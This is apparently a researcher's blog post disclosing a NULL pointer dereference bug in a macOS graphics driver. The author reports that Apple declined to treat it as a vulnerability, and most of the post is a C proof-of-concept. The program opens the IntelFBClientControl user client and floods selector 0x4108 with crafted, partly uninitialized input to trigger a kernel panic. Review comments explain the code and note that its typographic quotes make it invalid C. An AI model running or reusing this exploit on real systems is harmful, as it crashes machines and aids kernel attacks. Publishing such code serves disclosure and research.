NULL Pointer Reference Bug in AppleGraphicsDeviceControl Module

Apple no longer treats NULL Pointer Reference type bugs as vulnerabilities.

They replied to me with an email saying something like this:

it does not cross any security boundary because the NULL page
cannot be mapped on the OS. Therefore, will not issue any updates
or CVEs for it.

 

I am just publishing it here for fun. Please don’t use it for any malicious or business purposes.

 

 

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <IOKit/IOKitLib.h>

/*
 * Issue one IOConnectCallMethod() per loop iteration (1024 in total) against
 * the user client opened in main(), always with external-method selector
 * 0x4108.
 *
 * conn  - open user-client connection obtained from IOServiceOpen() in main().
 * value - the single scalar input passed on every call; main() passes 0x4118.
 *
 * Returns nothing. The kern_return_t from IOConnectCallMethod() is discarded,
 * so from user space a rejected call looks exactly like an accepted one; the
 * only observable outcome is whether the machine survives the loop.
 */
void trigger(io_connect_t conn, uint32_t value)

{

    uint64_t INPUTSCALAR[8];

    uint32_t INPUTSCALARCNT = 0;

    

    /* Deliberately NOT initialized. Only bytes [0,8) are written in the loop
     * below, but 29 bytes are handed to the kernel, so bytes [8,29) are
     * whatever happens to be on the stack. Anything the driver derives from
     * those bytes is therefore nondeterministic between runs. */
    char INPUTSTRUCT[4096];

    size_t INPUTSTRUCTCNT = 0X1000;   /* overwritten to 29 inside the loop */

    

    uint64_t OUTPUTSCALAR[8] = {0};

    uint32_t OUTPUTSCALARCNT = 0;

    

    /* Output struct capacity is forced to 0 inside the loop, so the kernel
     * never writes into OUTPUTSTRUCT and its contents are never inspected. */
    char OUTPUTSTRUCT[4096];

    size_t OUTPUTSTRUCTCNT = 0X1000;   /* overwritten to 0 inside the loop */

    

    //FILL INPUT

    for (int i=0; i<1024; i++) {

        /* The scalar input and all the counts are loop-invariant; the only
         * thing that changes per iteration is the first 4 bytes of the
         * struct input (set to i further down). */
        INPUTSCALAR[0] = value;

        INPUTSCALARCNT = 1;

        

        OUTPUTSCALARCNT = 1;

        INPUTSTRUCTCNT = 29;

        OUTPUTSTRUCTCNT = 0;

        

        /* NOTE(review): the quotes in this printf are typographic
         * (U+201C/U+201D), an artifact of how the listing was published;
         * the line as written is not valid C. */
        printf(“i=%d\n”, i);

        /* Struct input layout as sent: uint32 at offset 0 = i, uint32 at
         * offset 4 = 1, remaining 21 bytes uninitialized (see above). */
        *(uint32_t*)INPUTSTRUCT = i;

        *(uint32_t*)&INPUTSTRUCT[4] = 1;

        

        /* Return value ignored: errors are not surfaced to the caller. */
        IOConnectCallMethod(

                            conn,

                            0x4108,          /* external-method selector */

                            INPUTSCALAR,

                            INPUTSCALARCNT,  /* 1 scalar in */

                            INPUTSTRUCT,

                            INPUTSTRUCTCNT,  /* 29 bytes in */

                            OUTPUTSCALAR,

                            &OUTPUTSCALARCNT,/* room for 1 scalar out */

                            OUTPUTSTRUCT,

                            &OUTPUTSTRUCTCNT);/* 0 bytes out */

    }

}

/*
 * Entry point: locate the first IOKit service whose class matches
 * "IntelFBClientControl", open user-client type 2 on it, and hand the
 * connection to trigger(). Every failure path prints a message and
 * returns 0, so the process exit status never distinguishes success from
 * failure; the messages are the only diagnostic.
 *
 * Resource handling: the iterator, service and connection are never
 * released (no IOObjectRelease()/IOServiceClose()). That is harmless here
 * only because the process exits immediately afterwards.
 *
 * NOTE(review): the quotes in every string literal below are typographic
 * (U+201C/U+201D), an artifact of how the listing was published; the file
 * as written is not valid C.
 */
int main(){

    

    kern_return_t err;

    

    /* NOTE(review): the page title names AppleGraphicsDeviceControl, but the
     * class matched here is IntelFBClientControl — presumably the relevant
     * user-client-facing class; confirm against the driver in question. */
    CFMutableDictionaryRef Matching = IOServiceMatching(“IntelFBClientControl”);

    

    if(!Matching){

        

        printf(“UNABLE TO CREATE SERVICE MATCHING DICTIONARY\n”);

        

        return 0;

        

    }

    

    io_iterator_t iterator;

    

    /* IOServiceGetMatchingServices() consumes the reference to Matching, so
     * the dictionary must not be released again after this call. A
     * non-KERN_SUCCESS return means the lookup itself failed; an empty
     * result set is instead detected by the IOIteratorNext() check below. */
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, Matching, &iterator);

    

    if (err != KERN_SUCCESS){

        

        printf(“NO MATCHES\n”);

        return 0;

    }

    

    /* Only the first matching service is used; any further matches are
     * ignored. */
    io_service_t service = IOIteratorNext(iterator);

    

    if (service == IO_OBJECT_NULL){

        

        printf(“UNABLE TO FIND SERVICE\n”);

        

        return 0;

        

    }

    

    io_connect_t CONN = MACH_PORT_NULL;

    

    /* User-client type 2 is requested; what that type selects is decided by
     * the driver and is not shown in this listing. */
    err = IOServiceOpen(service, mach_task_self(), 2, &CONN);

    

    if (err != KERN_SUCCESS){

        

        printf(“UNABLE TO GET USER CLIENT CONNECTION\n”);

        

        return 0;

        

    }else{

        

        /* "%D" is a BSD/Apple printf extension (treated like "%ld"), not
         * standard C, and the argument supplied is a plain int 0 rather than
         * the actual user-client type; the value printed is hard-coded. */
        printf(“GOT USERCLIENT CONNECTION: %X, TYPE:%D\n”, CONN, 0);

        

    }

    

    trigger(CONN, 0x4118);

    

    /* Reached only if every call inside trigger() returned to user space;
     * a kernel-side fault during the loop ends the session before this. */
    printf(“PANIC?\n”);

    

    return 0;

    

}